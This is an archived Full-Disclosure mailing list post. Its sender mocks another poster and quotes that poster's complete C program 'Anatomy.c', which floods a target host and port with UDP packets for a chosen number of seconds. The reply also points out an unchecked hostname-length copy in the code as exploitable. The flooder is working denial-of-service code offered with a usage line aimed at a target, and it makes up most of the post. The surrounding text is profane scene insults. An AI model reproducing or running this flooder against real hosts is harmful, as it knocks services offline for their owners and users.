lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: rfp_the_ripper at hushmail.com (rfp_the_ripper@...hmail.com)
Subject: 411 [ sneak previews ] - #1

Ok jerkface, before you call ~el8 and phrack lame, why don't
you learn how to evolve beyond remedial sockets programming?

I won't be a pedant and point out the lack of error checking
and other minor points... but HEY BR0 WH4T'Z THIS:

>   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

Trusting h_length? [LOL] WTF R U TH1NK1NG BR0? [LOL] And how 
come the security expert Isaak Bloodlore didn't comment on 
this exploitable condition in the client?! 

>/* From the big generousity of el8 and phrack @ efnet. */
>                /* l4m3rz!! h4h4!!! */

h4h4h4h4h ell-oh-ell'ing @ u loolololooxzllioollzoolZ



>/*
>* Anatomy.c
>* I have no idea how this could be a threat
>* if it would be kept private.
>*
>* Published by: slackwh0re 
><slackwh0re@...k-el8-and-fuck-phrack_at_efnet.com>
>* Author: unknown <unknown@...nown.unk>
>*
>* k1dd13 us4g3: ./anatomy
>* 3ls3: `vi anatomy.c`
>*
>*      --slackwh0re
>*
>* Full-Disclosure, Fresh and shiny.
>* Full-Disclosure, Unreal hacking.
>* Full-Disclosure, Cos that's the real elite shit.
>* Full-Disclosure, Ken Levine does it.
>* Full-Disclosure, - since 1901.
>* Full-Disclosure, ~/Full-Disclosure directory.
>* Full-Disclosure, Erected because of it.
>* Full-Disclosure, Lame el8 blames
>* Full-Disclosure,l8er.
>*
>* He said: "Don't wonder why there is no comments."
>*/
>
>#define BOMB_STRING "0123456789ABCDE"
>#define BOMB_SIZE 15
>
>#include <stdio.h>
>#include <sys/param.h>
>#include <sys/socket.h>
>#include <sys/time.h>
>#include <time.h>
>#include <netinet/in.h>
>#include <netdb.h>
>#include <stdarg.h>
>
>int echo_connect(char *, short);
>
>int echo_connect(char *server, short port)
>{
>   struct sockaddr_in sin;
>   struct hostent *hp;
>   int thesock;
>
>   printf("\n");
>   printf("Stealth> %s : port %d\n", server, port);
>   hp = gethostbyname(server);
>   if (hp==NULL) {
>printf("Stealth> Non-existant host: %s\n",server);
>printf("\n");
>exit(0);
>   }
>   bzero((char*) &sin, sizeof(sin));
>   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
>   sin.sin_family = hp->h_addrtype;
>   sin.sin_port = htons(port);
>   thesock = socket(AF_INET, SOCK_DGRAM, 0);
>   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
>   return thesock;
>}
>main(int argc, char **argv)
>{
>   time_t start=time(NULL);
>   int s;
>   int secs;
>   if(argc != 4)
>   {
>
>printf("\n");
>printf("Anatomy Stealth By T10o Modified By The DvS. U dun Phee
>R?!\n");
>printf("\n");
>printf("Usage: st-kill <the lamer host> <fucking port> <secs>\n
>");
>printf("\n");
>exit(0);
>   }
>   s=echo_connect(argv[1], atoi(argv[2]));
>   secs= atoi(argv[3]);
>   for(;;)
>   {
>while(time(NULL) <= start+secs)
>{send(s, BOMB_STRING, BOMB_SIZE, 0);}
>exit(0);
>   }
>}
>
>/* From the big generousity of el8 and phrack @ efnet. */
>                /* l4m3rz!! h4h4!!! */
>
>
>
>
>
>_______________________________________________________________
>__
>Chat with friends online, try MSN Messenger: http://messenger.m
>sn.com
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>




Get your free encrypted email at https://www.hushmail.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ